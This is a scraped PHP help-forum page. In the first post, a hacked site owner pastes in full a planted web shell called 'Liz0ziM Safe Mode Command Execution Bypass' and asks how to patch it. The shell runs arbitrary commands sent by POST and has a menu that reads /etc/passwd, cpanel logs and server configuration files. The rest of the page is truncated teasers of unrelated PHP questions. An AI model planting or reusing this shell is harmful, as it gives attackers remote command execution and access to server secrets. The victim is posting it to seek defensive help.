I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
PHP, Arrays & A Lot Of Confusion
I've been doing basic PHP work on sites for a few years now, but I've never been tempted to learn how the ARRAY function worked, nor in what instances to use it. Now I've stumbled upon the jCarousel
Variables and Include
Code: [Select]<?php$header = $_COOKIE['mss']['header'];$body = $_COOKIE['mss']['body'];$footer = $_COOKIE['mss']['footer'];include '$header';include '$body';include '$footer';?>The
Save data in input fields when they press "BACK BUTTON"
Hi, this is html form: And let's say they get a error "Please enter ur title must be more then 3 character" then they click the BACK BUTTON AND ALL THERE DATA IS GONE!!How i fix?Code:
Tournament Brackets (Double Elimination)?
Is making a double elimination tournament style bracket system capable of being done in php?After dealing with numerous very well qualified programmers to only turn down the project due to difficulty
PDO returns erroneous columns from within pdt
Hi All,This is a truly weird behavior:When using a simple pdo fetch, erroneous columns are returned!Steps to reproduce:------------------------------------------------------------ -----------1.create
Read from a text file after a specific word
Hi all. I have a text file that looks like the one below. I know how to open the text file but I need to get the php pointer to take a value suck as $username. Once it finds $username, i need it to
want a code for uploading and downloading
i m trying to upload and download to my site..i need upload and download code ...i use a code for upload but that is not working actually..i don't know what is the problem.when i upload a file and
mail() problem
Hi Guys,I've set up a contact email form. It sends the information fine, but it sends it to the junk folder.If I just use this command:$headers = "MIME-Version: 1.0 \n";It will send it to
Posting Serialized Data Not Working
I am trying to send an object from one PHP file to another using POST. I serialize the object and then add slashes. For some reason, only part of the data is getting through. It appears to be a
php mysql query from input textbox
Hi,I have a text box, in that i have given the mysql query. I can able to get the query in variable. But after submit button i want to get data to be printed on a same page. But how can i print the
